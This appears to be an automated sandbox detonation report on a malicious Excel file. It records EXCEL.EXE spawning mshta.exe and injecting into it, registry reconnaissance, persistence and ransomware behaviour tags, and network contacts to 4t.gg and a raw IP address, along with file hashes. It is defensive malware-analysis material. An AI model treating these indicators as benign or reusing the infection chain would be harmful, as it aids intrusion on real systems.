MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-14 02:32

Reported

2024-11-14 02:34

Platform

win10v2004-20241007-en

Max time kernel

145s

Max time network

153s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\62ebacf04ae91df07d6acb4b8deb8960ec8c42c2accf6323ecadee31d95151d1.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 956 wrote to memory of 1500 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe
PID 956 wrote to memory of 1500 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\62ebacf04ae91df07d6acb4b8deb8960ec8c42c2accf6323ecadee31d95151d1.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
GB 52.109.28.47:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 4t.gg udp
KR 221.146.204.133:443 4t.gg tcp
US 8.8.8.8:53 47.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 88.221.135.106:80 r10.o.lencr.org tcp
US 8.8.8.8:53 133.204.146.221.in-addr.arpa udp
US 8.8.8.8:53 168.245.100.95.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 106.135.221.88.in-addr.arpa udp
US 192.3.220.29:80 192.3.220.29 tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 29.220.3.192.in-addr.arpa udp
US 8.8.8.8:53 27.178.89.13.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp

Files

memory/956-1-0x00007FFDFF6ED000-0x00007FFDFF6EE000-memory.dmp

memory/956-3-0x00007FFDBF6D0000-0x00007FFDBF6E0000-memory.dmp

memory/956-4-0x00007FFDBF6D0000-0x00007FFDBF6E0000-memory.dmp

memory/956-2-0x00007FFDBF6D0000-0x00007FFDBF6E0000-memory.dmp

memory/956-7-0x00007FFDFF650000-0x00007FFDFF845000-memory.dmp

memory/956-8-0x00007FFDFF650000-0x00007FFDFF845000-memory.dmp

memory/956-9-0x00007FFDFF650000-0x00007FFDFF845000-memory.dmp

memory/956-6-0x00007FFDBF6D0000-0x00007FFDBF6E0000-memory.dmp

memory/956-5-0x00007FFDFF650000-0x00007FFDFF845000-memory.dmp

memory/956-0-0x00007FFDBF6D0000-0x00007FFDBF6E0000-memory.dmp

memory/956-12-0x00007FFDFF650000-0x00007FFDFF845000-memory.dmp

memory/956-11-0x00007FFDFF650000-0x00007FFDFF845000-memory.dmp

memory/956-13-0x00007FFDFF650000-0x00007FFDFF845000-memory.dmp

memory/956-14-0x00007FFDFF650000-0x00007FFDFF845000-memory.dmp

memory/956-17-0x00007FFDFF650000-0x00007FFDFF845000-memory.dmp

memory/956-18-0x00007FFDFF650000-0x00007FFDFF845000-memory.dmp

memory/956-16-0x00007FFDFF650000-0x00007FFDFF845000-memory.dmp

memory/956-15-0x00007FFDFF650000-0x00007FFDFF845000-memory.dmp

memory/956-10-0x00007FFDBD370000-0x00007FFDBD380000-memory.dmp

memory/956-20-0x00007FFDBD370000-0x00007FFDBD380000-memory.dmp

memory/1500-41-0x00007FFDFF650000-0x00007FFDFF845000-memory.dmp

memory/1500-42-0x00007FFDFF650000-0x00007FFDFF845000-memory.dmp

memory/956-44-0x00007FFDFF6ED000-0x00007FFDFF6EE000-memory.dmp

memory/956-45-0x00007FFDFF650000-0x00007FFDFF845000-memory.dmp

memory/1500-49-0x00007FFDFF650000-0x00007FFDFF845000-memory.dmp

memory/1500-50-0x00007FF78C2A0000-0x00007FF78C2A8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 5ca797b673195d888a1f1f8540f2e328
SHA1 a15790fe520ebd358bbaefa76c7215fea970c5c7
SHA256 9dbe318fc250e9b4016425c5b5d077916b7eb7220c299df089eb8ecd388772f5
SHA512 94b716ca87ad62978721ea9b278f4c7a8bb1bd7f493692f65d328242cf357def4572040e868b03632da1aa09e53ba6abaef35d58796601705ec4e58635857c91